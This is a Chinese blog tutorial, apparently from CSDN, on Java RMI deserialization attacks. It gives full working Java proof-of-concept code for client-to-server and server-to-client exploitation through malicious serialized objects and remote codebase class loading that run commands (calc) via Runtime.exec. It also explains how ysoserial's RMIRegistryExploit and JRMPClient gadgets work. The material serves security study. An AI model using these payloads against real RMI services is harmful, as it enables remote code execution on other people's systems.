Java RMI反序列化总结篇-01

已于 2024-05-14 19:12:21 修改
阅读量1.1k 收藏 20
点赞数 31
分类专栏: Java安全 文章标签: java Java安全 安全
于 2024-05-14 19:09:02 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wfz2333/article/details/138866134
版权

1.java rmi反序列化

RMI 允许一个应用程序访问另外一个服务器或虚拟机上的对象,方法和服务,它使远程方法调用就像在本地调用一样简单。它为用户屏蔽了底层的网络传输细节,使用的时候只需适当处理异常即可。所以 RMI 是非常容易使用的,但同时是非常强大的。

RMI 协议的数据序列化目前支持以下两种模式:
1.基于 JDK 本身的对象序列化
2.基于 HTTP 协议的数据序列化

关于rmi客户端和服务端通信的过程,java的方法都实现在rmi服务端,客户端实际上是通过访问rmi注册表拿到stub,然后再通过它调用服务端方法,那么调用方法时要传递参数,参数可以为一般类型,也可以为引用类型,那么如果为引用类型,就能够利用服务端已经有的gaget chain来打server,因为参数实际上是序列化传输的,那么数据到达服务端后必定会经过反序列化。

Stub和Skeleton:这两个的身份是一致的,都是作为代理的存在。

客户端:

RMIClient.java

package com.longofo.javarmi;

import java.rmi.registry.LocateRegistry;
import java.rmi.registry.Registry;

public class RMIClient {
    /**
     * Java RMI恶意利用demo
     *
     * @param args
     * @throws Exception
     */
    public static void main(String[] args) throws Exception {
        Registry registry = LocateRegistry.getRegistry("127.0.0.1", 9999);
        // 获取远程对象的引用
        Services services = (Services) registry.lookup("Services");
        PublicKnown malicious = new PublicKnown();
        malicious.setParam("calc");
        malicious.setMessage("haha");

        // 使用远程对象的引用调用对应的方法
        System.out.println(services.sendMessage(malicious));
    }
}

此时客户端要打服务端,因此要将恶意的对象作为参数传递到服务端,此时序列化的对象将在服务端反序列化

publicKnown.java

package com.longofo.javarmi;

import java.io.IOException;
import java.io.ObjectInputStream;
import java.io.Serializable;

public class PublicKnown extends Message implements Serializable {
    private static final long serialVersionUID = 7439581476576889858L;
    private String param;

    public void setParam(String param) {
        this.param = param;
    }

    private void readObject(ObjectInputStream in) throws IOException, ClassNotFoundException {
        in.defaultReadObject();
        Runtime.getRuntime().exec(this.param);
    }
}

此时要传递的恶意对象肯定要符合服务端参数类型的定义

服务端:

RMIServer.java

//RMIServer.java
package com.longofo.javarmi;

import java.rmi.AlreadyBoundException;
import java.rmi.RemoteException;
import java.rmi.registry.LocateRegistry;
import java.rmi.registry.Registry;
import java.rmi.server.UnicastRemoteObject;

public class RMIServer {
    /**
     * Java RMI 服务端
     *
     * @param args
     */
    public static void main(String[] args) {
        try {
            // 实例化服务端远程对象
            ServicesImpl obj = new ServicesImpl();
            // 没有继承UnicastRemoteObject时需要使用静态方法exportObject处理
            Services services = (Services) UnicastRemoteObject.exportObject(obj, 0);
            Registry reg;
            try {
                // 创建Registry
                reg = LocateRegistry.createRegistry(9999);
                System.out.println("java RMI registry created. port on 9999...");
            } catch (Exception e) {
                System.out.println("Using existing registry");
                reg = LocateRegistry.getRegistry();
            }
            //绑定远程对象到Registry
            reg.bind("Services", services);
        } catch (RemoteException e) {
            e.printStackTrace();
        } catch (AlreadyBoundException e) {
            e.printStackTrace();
        }
    }
}

服务端在创建注册表服务时,在返回的RegistryImpl中调用setup,实际上封装了一个UnicastServerRef,在setup函数中,RegistryImpl由于继承RemoteServer,又间接继承自RemoteObject,因此其具有RemoteRef这个filed,即this.ref,此时就把UnicastServerRef赋值给ref(子类对象指向父类引用),接着调用UnicastServerRefe的xportObject把this.ref传入,跟进exportObject可以发现这里实际是服务端为RegistryImpl用Remteinvocationhandler创建了一个动态代理,其中被代理的是new的一个UnicastRef,从instanceof RemoteStub可以猜到这个Remote的代理对象应该就是给客户端用的Stub,接着调用this.setSkeleton设置RegisImpl为服务端的skel,即与客户端通信的骨架,流程如下图所示:

从图中就能看到RegisImpl最终传到了createSkeleton函数中,此时得到RegistryImpl类赋给var1,接着拼接上_Skel作为RegistryImpl_skel作为真正服务端接受客户端请求(lookup,rebind等)调用函数的类,对应的文件就是

 到这里服务端就设置完了骨架 ,接着下一步封装完毕后,接着就到了连接层了,这个target包含了RegisImpl、UnicastServerRef、创建的stub,LiveRef的id和一个boolean值,此时再调用this.ref,即LiveRef的exportObject传入Target,这里就到了TCPTranport的exportObject,里面调用listen来等待客户端的连接,最终获得一个可以发布服务的TCPEndpoint对象,并调用该对象把服务(Target)暴露出去

 jdk里面也已经说了RemoteRef代表对远程对象具体的具体处理,客户端拿着RemoteStub使用远程引用来调用远程对象的方法。

ServiceImpl.java

package com.longofo.javarmi;

import java.rmi.RemoteException;

public class ServicesImpl implements Services {
    public ServicesImpl() throws RemoteException {
    }

    @Override
    public Object sendMessage(Message msg) throws RemoteException {
        return msg.getMessage();
    }
}
Service.java

package com.longofo.javarmi;

import java.rmi.RemoteException;

public interface Services extends java.rmi.Remote {
    Object sendMessage(Message msg) throws RemoteException;
}
Message.java

package com.longofo.javarmi;

import java.io.Serializable;

public class Message implements Serializable {
    private static final long serialVersionUID = -6210579029160025375L;
    private String msg;

    public Message() {
    }

    public String getMessage() {
        System.out.println("Processing message: " + msg);
        return msg;
    }

    public void setMessage(String msg) {
        this.msg = msg;
    }
}

所以这里服务端存在漏洞的即为ServicesImpl类,其存在一个方法其入口参数为Message对象,并且这里Message这个类是继承自Serializable,即可以进行反序列化。服务端通过bind()函数绑定远程对象到RMI注册表中,此时客户端即可以访问RMI注册表拿到stub,即可调用服务端的方法,比如sendMessage()函数

此时先启动RMIServer.java,然后再启动RMIClient.java,即可达到打rmi服务端的效果,这里jdk版本为1.6

在服务端的readObject处下断点,即可看到调用栈,经过ConnectHandler后就能够确定服务端要反序列化的类名

 接下来就是通过反射调用PublicKnown类的readObject方法 ,进而到达readObject内部的命令执行代码段

所以这里客户端肯定要知道服务端有哪些可以调用的方法,以及服务端被调用的方法入口参数要满足要求,这里在现实情况中应该很少能够遇到,这里肯定只作为例子来学习。当然反序列化的类可以是本地的gadget,这个例子的测试没有jdk版本限制,在jdk1.8.202也可以成功,这些限制太大了。在这里实际上就是拿到ServicesImpl的引用,lookup函数查找的也一定是存在与rmi注册表中存在的对象并拿到引用,并不是直接拷贝了一份该类的对象到本地来,拿到引用之后再去调用该类的方法,传参到服务端,最后反序列化执行在服务端。

tip:服务端要绑定到rmi 注册表的对象实现的接口必须继承自remote,而该对象所对应的接口实现类必须继承UnicastRemoteObject,否则需要使用静态方法exportObject处理该对象

在服务端创建注册标服务时调用createRegistry,此时服务端执行后返回的是类RegistryImpl的实例,然后调用其bind

  

其中bindings就是一个hashtable,那么实际上在服务端bind的时候就是单纯的执行一个放入远程对象到hashtable中的操作

那么客户端调用getRegistry实际上根据jdk源码注释可以看到拿到的是远程注册表服务的引用,称作为stub

 然而客户端最终返回的不是RegistryIMPL,返回的是一个动态代理封装过后的Registry对象

 所以这里说明用的是注册表对象的远程引用,也就是RegistryImpl_stub,对应的rt.jar!\sun\rmi\registry\RegistryImpl_Stub.class中客户端可以执行的操作如下所示:

new Operation[]{new Operation("void bind(java.lang.String, java.rmi.Remote)"), new Operation("java.lang.String list()[]"), new Operation("java.rmi.Remote lookup(java.lang.String)"), new Operation("void rebind(java.lang.String, java.rmi.Remote)"), new Operation("void unbind(java.lang.String)")};

 一共有5种,那么实际在通信过程中对应的就是服务端的RegistryImpl_skel,其中dispatch方法中将根据stub传输的var3变量,也就是客户端想要执行的方法对应的标识值来进入不同的分支进行处理,var4就是标识stub和skel的hash,这样通信就对应起来了。

放一张seebug的图, 所以客户端要访问远程对象就由服务端首先把远程对象注册到注册表,然后客户端先访问注册表拿到远程对象的stub以后,此时就可以像访问本地一样调用远程对象方法,底层由stub再接受客户端的参数和方法,然后就是stub作为代理再帮客户端请求服务端,把参数和方法都发送到服务端,服务端接收到参数和方法后,在服务端进行执行,再把返回结果给客户端的stub,stub再给客户端,所以客户端实际上看不到底层的通信逻辑,这种架构设计已经屏蔽了底层通信。

 

 ysoserial中有对注册表的直接攻击为,RMIRegistryExploit,其中调用registry的bind来绑定远程对象,remote是用cc1封装的一个代理,其中invocationhandler用的就是annotationinvocationahandler,把cc1通过调用createMap放到map再给annotationinvocationahandler的membervalues

 

然后创建动态代理,接口就是Remote.class,handler就是annotationinvocationhandler,最后再Remote.class.cast将动态代理转换为Remote对象,那么做到这一步,外层封装的看起来就是一个正常的远程对象,精华就在handler中,最后构造好Remote对象以后,再通过调用bind将其绑定到注册表中,就能够触发注册表端的RMI反序列化。

这里注意一下如果想打注册表,但是AnnotaionInvocationhandler被过滤了,也就是此时用该类作为动态代理的handler不能用了,所以此时就要找到其他的handler,并且要把最终的gadget放到里面,ysoserial中的payloads/JRMPClient就实现了该功能用来进行绕过:

 这里要封装一个Registry对象,而Registry是继承Remote类的

所以Registry可以被作为远程对象进行注册表绑定,这里的handler用的是RemoteObjectInvocationHandler作为动态代理的handler,封装这个handler需要objid(标识唯一的远程对象),而该类构造函数需要传一个RemoteRef

所以这里又封装了一个UnicastRef,作为注册端反序列化的对象(反序列化它然后回连JRMPListener),因为UnicastRef实现RemoteRef接口

 客户端获取服务端Rgistry代理

 客户端通过指定host和port来获取远程对象的引用,根绝jdk注释也就是获得reference(a stub)

这里把注册表的host和port封装进UnicastRef,然后构造一个RemoteRef,接着再用动态代理来代理Registry,其中RemoteObjectInvocationHandler中包含着UnicastRef,即远程注册表的host和port,这样客户端便有了服务端的RegistryImpl的代理,即客户端有了RegistryImpl_Stub。

2.java rmi 动态加载类

2.1RMI服务端打客户端

java rmi动态加载类,其实就是通过指定codebase来制定远程的类仓库,我们知道java在运行过程中需要类的时候可以在本地加载,即在classpath中找,那么也可以通过codebase来指定远程库。默认是不允许远程加载的,如需加载则需要安装RMISecurityManager并且配置java.security.policy。并且需要java.rmi.server.useCodebaseOnly 的值必需为false,当然这也是受jdk版本限制的。

RMIClient.java

package com.longofo.javarmi;

import java.rmi.RMISecurityManager;
import java.rmi.registry.LocateRegistry;
import java.rmi.registry.Registry;

public class RMIClient1 {
    /**
     * Java RMI恶意利用demo
     *
     * @param args
     * @throws Exception
     */
    public static void main(String[] args) throws Exception {
        //如果需要使用RMI的动态加载功能,需要开启RMISecurityManager,并配置policy以允许从远程加载类库
        System.setProperty("java.security.policy", RMIClient1.class.getClassLoader().getResource("java.policy").getFile());
        RMISecurityManager securityManager = new RMISecurityManager();
        System.setSecurityManager(securityManager);

        Registry registry = LocateRegistry.getRegistry("127.0.0.1", 9999);
        // 获取远程对象的引用
        Services services = (Services) registry.lookup("Services");
        Message message = new Message();
        message.setMessage("hahaha");

        services.sendMessage(message);
    }
}

此时RMI客户端正常操作,传入Message对象,并调用服务端sendMessage方法

ServiceImpl.java

package com.longofo.javarmi;

import com.longofo.remoteclass.ExportObject;

import java.rmi.RemoteException;

public class ServicesImpl1 implements Services {
    @Override
    public ExportObject sendMessage(Message msg) throws RemoteException {
        return new ExportObject();
    }
}

可以看到此时服务端实现Services接口的类的sendMessage方法返回值为ExportObject类型,即该类的实例

ExportObject.java

//
// Source code recreated from a .class file by IntelliJ IDEA
// (powered by Fernflower decompiler)
//

package com.longofo.remoteclass;

import java.io.BufferedInputStream;
import java.io.BufferedReader;
import java.io.InputStreamReader;
import java.io.Serializable;
import java.util.Hashtable;
import javax.naming.Context;
import javax.naming.Name;
import javax.naming.spi.ObjectFactory;

public class ExportObject implements ObjectFactory, Serializable {
    private static final long serialVersionUID = 4474289574195395731L;

    public ExportObject() {
    }

    public static void exec(String cmd) throws Exception {
        String sb = "";
        BufferedInputStream in = new BufferedInputStream(Runtime.getRuntime().exec(cmd).getInputStream());

        BufferedReader inBr;
        String lineStr;
        for(inBr = new BufferedReader(new InputStreamReader(in)); (lineStr = inBr.readLine()) != null; sb = sb + lineStr + "\n") {
        }

        inBr.close();
        in.close();
    }

    public Object getObjectInstance(Object obj, Name name, Context nameCtx, Hashtable<?, ?> environment) throws Exception {
        return null;
    }

    static {
        try {
            exec("calc");
        } catch (Exception var1) {
            var1.printStackTrace();
        }

    }
}

这里实际上服务端返回的即为该ExportObject类的实例,该类是实现了对象工厂类,并且可以序列化的,所以可以通过jrmp进行传输,我们只需要将其编译放在服务器端指定的codebase地址即可等待客户端来加载,当客户端远程加载该类时将会实例化该类,即调用该类的static代码段

RMIServer.java

package com.longofo.javarmi;

import java.rmi.AlreadyBoundException;
import java.rmi.RemoteException;
import java.rmi.registry.LocateRegistry;
import java.rmi.registry.Registry;
import java.rmi.server.UnicastRemoteObject;

public class RMIServer1 {
    public static void main(String[] args) {
        try {
            // 实例化服务端远程对象
            ServicesImpl1 obj = new ServicesImpl1();
            // 没有继承UnicastRemoteObject时需要使用静态方法exportObject处理
            Services services = (Services) UnicastRemoteObject.exportObject(obj, 0);

            //设置java.rmi.server.codebase
            System.setProperty("java.rmi.server.codebase", "http://127.0.0.1:8000/");

            Registry reg;
            try {
                // 创建Registry
                reg = LocateRegistry.createRegistry(9999);
                System.out.println("java RMI registry created. port on 9999...");
            } catch (Exception e) {
                System.out.println("Using existing registry");
                reg = LocateRegistry.getRegistry();
            }
            //绑定远程对象到Registry
            reg.bind("Services", services);
        } catch (RemoteException e) {
            e.printStackTrace();
        } catch (AlreadyBoundException e) {
            e.printStackTrace();
        }
    }
}

此时RMIServer端指定了客户端codebase的地址,即客户端反序列化ExportObject时需要加载该类,此时将通过服务端提供的codebase来加载

此时先启动托管远程类的服务端,将ExportObject.class放在codebase指定的位置,这里要注意包名要和目录名相一致

然后启动RMI服务端,启动RMI客户端,即完成了客户端要调用sendMessage方法,此时服务端返回了ExportObject对象,客户端发现返回的是ExportObject对象后,那将在本地的classpath中没找到该类,则通过服务端指定的codebase来加载该类,加载该类的后将实例化该类,从而触发calc

此时托管class的http服务端也收到了加载class文件的请求

这种方法相对于第一种来说打客户端只需要拿到RMI中对象的引用,调用服务器上的方法即可,这里服务器是攻击者控制的,只需要在方法中返回恶意对象即可,当然如前面所说,这里是需要securitManager和useCodebaseOnly为false以及jdk限制的,这里是服务端指定javacodebase的。

2.2RMI客户端打服务端

RMIClient.java

package com.longofo.javarmi;

import com.longofo.remoteclass.ExportObject1;

import java.rmi.registry.LocateRegistry;
import java.rmi.registry.Registry;

public class RMIClient2 {
    public static void main(String[] args) throws Exception {
        System.setProperty("java.rmi.server.codebase", "http://127.0.0.1:8000/");
        Registry registry = LocateRegistry.getRegistry("127.0.0.1",9999);
        // 获取远程对象的引用
        Services services = (Services) registry.lookup("Services");
        ExportObject1 exportObject1 = new ExportObject1();
        exportObject1.setMessage("hahaha");

        services.sendMessage(exportObject1);
    }
}

上面RMI客户端打RMI服务端是服务端来指定codebase地址供客户端参考,客户端来加载codebase地址的class文件,那么从上面这段代码可以看到此时是客户端指定了codebase地址,那么当然服务端就得从客户端指定的codebase来加载class了,可以看到此时客户端调用服务端的sendMessage函数传递的是ExportObject1对象

ExportObject1.java

package com.longofo.remoteclass;

import com.longofo.javarmi.Message;

import javax.naming.Context;
import javax.naming.Name;
import javax.naming.spi.ObjectFactory;
import java.io.Serializable;
import java.util.Hashtable;

public class ExportObject1 extends Message implements ObjectFactory, Serializable {

    private static final long serialVersionUID = 4474289574195395731L;


    public Object getObjectInstance(Object obj, Name name, Context nameCtx, Hashtable<?, ?> environment) throws Exception {
        return null;
    }
}

此时该类继承自Message类,实现对象工厂接口,并且支持序列化

ServiceImpl.java

package com.longofo.javarmi;

import java.rmi.RemoteException;

public class ServicesImpl implements Services {
    public ServicesImpl() throws RemoteException {
    }

    @Override
    public Object sendMessage(Message msg) throws RemoteException {
        return msg.getMessage();
    }
}

RMIServer.java

//RMIServer2.java
package com.longofo.javarmi;

import java.rmi.AlreadyBoundException;
import java.rmi.RMISecurityManager;
import java.rmi.RemoteException;
import java.rmi.registry.LocateRegistry;
import java.rmi.registry.Registry;
import java.rmi.server.UnicastRemoteObject;

public class RMIServer2 {
    /**
     * Java RMI 服务端
     *
     * @param args
     */
    public static void main(String[] args) {
        try {
            // 实例化服务端远程对象
            ServicesImpl obj = new ServicesImpl();
            // 没有继承UnicastRemoteObject时需要使用静态方法exportObject处理
            Services services = (Services) UnicastRemoteObject.exportObject(obj, 0);
            Registry reg;
            try {
                //如果需要使用RMI的动态加载功能,需要开启RMISecurityManager,并配置policy以允许从远程加载类库
                System.setProperty("java.security.policy", RMIServer.class.getClassLoader().getResource("java.policy").getFile());
                RMISecurityManager securityManager = new RMISecurityManager();
                System.setSecurityManager(securityManager);

                // 创建Registry
                reg = LocateRegistry.createRegistry(9999);
                System.out.println("java RMI registry created. port on 9999...");
            } catch (Exception e) {
                System.out.println("Using existing registry");
                reg = LocateRegistry.getRegistry();
            }
            //绑定远程对象到Registry
            reg.bind("Services", services);
        } catch (RemoteException e) {
            e.printStackTrace();
        } catch (AlreadyBoundException e) {
            e.printStackTrace();
        }
    }
}

可以由以上代码看到,此时RMI服务端绑定的services接口对应的ServicesImpl.java中sendMessage函数将会调用入口参数Message类型对象的getmessage函数,这里方法体内容是什么并不重要,因为这种打法和第一节中的打法一样,都是打RMI服务端,区别是第一节是利用RMI服务端本地的gaget chain,而这里则是利用远程类加载,通过客户端指定的codebase来打RMI服务端。

 所以此时codebase的地址也将受到请求ExportObject1.class的请求,因为服务端发现穿送过来的ExportObject1类classpath里面没有,所有就会通过客户端指定的codebase加载,从而实例化该恶意ExportObject1类,执行static代码块的命令

所以上面两个例子,客户端打RMI服务端,以及RMI服务端打客户端都是利用RMI的调用过程:

1.客户端打RMI服务端,客户端调用服务端方法,此时传给服务端的的参数可控则可能存在风险(这种条件挺难满足)

2.RMI打客户端,RMI服务端返回给客户端的结果是服务端可控的,则该结果则可能存在风险(lookup可控,并且恶意RMI服务端也要自己实现)

和以前分析其他漏洞时的逻辑还是比较相似的,可控即可能存在风险

关于客户端和服务端互打里面,因为要传递序列化的对象,序列化的过程中要知道serialVersionUID,要传递的反序列化的对象的包名,类名必须要与服务端一致,这里serialVersionID在访问的文章审核中... - FreeBuf网络安全行业门户这篇文章中说第一次不传递id参数服务端将会返回id值,但是我本地测jdk1.6.01这里客户端不加id值,也能够打成功。

RMI-JRMP

上面说的RMI通信过程中假设客户端在与RMI服务端通信中,虽然也是在JRMP协议上进行通信,尝试传输序列化的恶意对象到服务端,此时服务端若也返回客户端一个恶意序列化的对象,那么客户端也可能被攻击,利用JRMP就可以利用socket进行通信,客户端直接利用JRMP协议发送数据,而不用接受服务端的返回,因此这种攻击方式也更加安全。

比如服务端此时启用RMI服务,那么就可以用yso的exploit/JRMPClient来打rmi服务端

jdk1.7.0_25

如有错误,务必请指出。

参考:https://www.anquanke.com/post/id/194384#h3-3

tr1ple :)
关注
  • 31
    点赞
  • 20
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
javaRMI反序列化漏洞验证工具
08-21
检测javaRMI反序列化漏洞
Javaweb安全——RMI反序列化
weixin_43610673的博客
04-13 1200
RMI RMI(Remote Method Invocation)即Java远程方法调用,RMI用于构建分布式应用程序,类似于RPC(Remote Procedure Call Protocol)远程过程调用协议,RMI实现了Java程序之间跨JVM的远程通信,使得一个JMV上的对象可以调用另一个JMV上的方法(方法在远程JVM上执行,只是返回运行结果)。这两个JVM可以是运行在相同计算机上的不同进程中,也可以是运行在网络上的不同计算机中。 RMI架构: RMI分为三个主体部分:Client,Server
java反序列化-RMI
最新发布
weixin_40151476的博客
03-04 848
RMI(Remote Method Invocation),远程方法调用。跟RPC差不多,是java独立实现的一种机制。实际上就是在一个java虚拟机上调用另一个java虚拟机的对象上的方法。RMI依赖的通信协议为JRMP(Java Remote Message Protocol ,Java 远程消息交换协议),该协议为Java定制,要求服务端与客户端都为Java编写。这个协议就像HTTP协议一样,规定了客户端和服务端通信要满足的规范。(我们可以再之后数据包中看到该协议特征)。
反序列化RMI分析
m0_61869253的博客
09-14 51
在分析Fastjson漏洞前,需要了解RMI机制和JNDI注入等知识点,所以本文来分析一下RMI机制。在Java里面简单来说使用Java调用远程Java程序使用的就是RMI,调用C的程序调用的是JNI,调用python程序使用到的是Jython。RMI、JNI、Jython,其实在安全中都能发挥比较大的作用。JNI在安全里面的运用就比较大了,既然可以调用C语言,那么后面的… …自行脑补。这个暂且忽略不讲,后面再说。
RMI反序列漏洞复现-——手把手光速复现,工具超全
weixin_37771454的博客
03-24 3026
RMI反序列漏洞复现-手把手光速复现,工具超全一、靶机部署:二、本机怎样查看是不是可以回显?三、attackRMI利用 RMI是REMOTE METHOD INVOCATION的简称,是J2SE的一部分,能够让程序员开发出基于JAVA的分布式应用。一个RMI对象是一个远程JAVA对象,可以从另一个JAVA虚拟机上(甚至跨过网络)调用它的方法,可以像调用本地JAVA对象的方法一样调用远程对象的方法,...
146-从Java RMI反序列化到内网沦陷.pdf
09-20
146-从Java RMI反序列化到内网沦陷.pdf
java序列化和反序列化,面试必备
12-21
最近阅读Serializable接口和Externalizable接口的源码,并结合了一些资料,对面试过程中与序列化相关的内容做了一些总结。 一、序列化、反序列化、使用场景、意义。 序列化:将对象写入IO流中; 反序列化:从IO流中...
深入分析Java的序列化与反序列化
12-22
本文通过分析ArrayList的序列化来介绍Java序列化的相关内容。主要涉及到以下几个问题:  怎么实现Java的序列化  为什么实现了java.io.Serializable接口才能被序列化  transient的作用是什么  怎么自定义序列...
RMIDeserialize:RMI 反序列化环境 一步步
04-22
RMI反序列化学习环境,细节请参考博客、 java -cp RMIDeserialize.jar com.lala.ServerAndRegister :起一个包含CC链可以被攻击的RMI服务 java -jar RMI-Bypass290.jar <攻击目标IP> <攻击目标端口> <本地...
理解Java的序列化与反序列化
09-02
主要为大家详细介绍了Java的序列化与反序列化,序列化是一种对象持久化的手段。普遍应用在网络传输、RMI等场景中。本文通过分析ArrayList的序列化来介绍Java序列化的相关内容,感兴趣的小伙伴们可以参考一下
java反序列化漏洞工具AllInOne
01-05
java反序列化漏洞检测工具集 支持 jboss weblogic Websphere 本工具仅为方便管理员发现和展示漏洞的危害性,请勿用于非法用途
rmi 反序列化漏洞_Java安全RMI反序列化
weixin_35374026的博客
01-13 1146
Java安全RMI反序列化0x00 前言在分析Fastjson漏洞前,需要了解RMI机制和JNDI注入等知识点,所以本文来分析一下RMI机制。在Java里面简单来说使用Java调用远程Java程序使用的就是RMI,调用C的程序调用的是JNI,调用python程序使用到的是Jython。RMI、JNI、Jython,其实在安全中都能发挥比较大的作用。 JNI在安全里面的运用就比较大了,既然可以...
【vulhub】Weblogic(CVE-2018-2628)漏洞复现
qq_45300786的博客
04-10 2408
一、什么是WebLogic WebLogic是美国Oracle公司出品的一个application server,确切的说是一个基于JAVAEE架构的中间件,WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。将Java的动态功能和Java Enterprise标准的安全性引入大型网络应用的开发、集成、部署和管理之中。 先提几个概念 JRMP:java remote method protocol,Java远程方法协议 JRMP是的Java技术协议的具
rmi 反序列化漏洞_写一个rmi反序列化工具
weixin_39997037的博客
01-07 2154
RMI(java 远程方法调用),RMI服务端和客户端之间通过序列化对象进行传输,所以JDK8 U121之前的版本存在反序列化漏洞。RMIjava反序列化原理就不详细介绍了。RMI反序列化利用成功的条件如下:1.能够进行rmi通信。2.JDK版本小于8.0.1213.引入存在反序列化链的库,以commons.collections为例的话,就需要其版本小于commons.collec...
rmi反序列化导致rce漏洞修复_RMI反序列化漏洞分析
weixin_39710249的博客
12-23 443
RMI简介首先看一下RMI在wikipedia上的描述:Java远程方法调用,即JavaRMI(JavaRemote MethodInvocation)是Java编程语言里,一种用于实现远程过程调用的应用程序编程接口。它使客户机上运行的程序可以调用远程服务器上的对象。远程方法调用特性使Java编程人员能够在网络环境中分布操作。RMI全部的宗旨就是尽可能简化远程接口对象的使用。JavaRMI极大地依...
java安全(五)java反序列化
weixin_45694388的博客
04-09 6299
序列化 在调用RMI时,发现接收发送数据都是反序列化数据. 例如JSON和XML等语言,在网络上传递信息,都会用到一些格式化数据,大多数处理方法中,JSON和XML支持的数据类型就是基本数据类型,整型、浮点型、字符串、布尔等,如果开发者希望在传输数据的时候直接传输一个对象,那么就不得不想办法扩展基础的JSON(XML)语法。比如,Jackson和Fastjson这类序列化库,在JSON(XML)的基础上进行改造,通过特定的语法来传递对象. RMI使用java等语言内置的序列化方法,将一个对象转化成一串二进制
java反序列化rce rmi jrmp jndi 原理
whatday的专栏
12-27 876
RMI攻击主要分3种目标:RMI Client、RMI Server、RMI Registry。使用远程Reference字节码进行攻击。从jdk8u121开始,RMI加入了反序列化白名单机制,JRMP的payload登上舞台,这里的payload指的是ysoserial修改后的JRMPClient。从jdk8u121开始,RMI远程Reference代码默认不信任,RMI远程Reference代码攻击方式开始失效。
java反射:2、什么是java序列化?什么情况下需要序列化?
weixin_42924812的博客
11-23 661
文章目录什么是java序列化什么情况下需要序列化 什么是java序列化 什么情况下需要序列化
java中什么情况属于序列化和反序列化
05-26
Java中,序列化是将对象转换为字节序列的过程,以便将其存储在文件中或通过网络发送。反序列化是将字节序列转换回对象的过程。 以下情况属于序列化和反序列化: 1. 将对象写入文件或数据库,并从文件或数据库中读取对象。 2. 通过网络发送对象,例如在客户端和服务器之间传递数据。 3. 在分布式系统中,将对象从一个节点传递到另一个节点。 4. 在使用Java集合时,需要将对象转换为字节序列进行存储或传输。 5. 在使用Java RMI (远程方法调用)时,需要将对象序列化以进行远程传输和调用。 在这些情况下,需要将对象序列化为字节序列,以便它们可以在不同的环境中进行传输和存储,并在需要时反序列化为对象。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值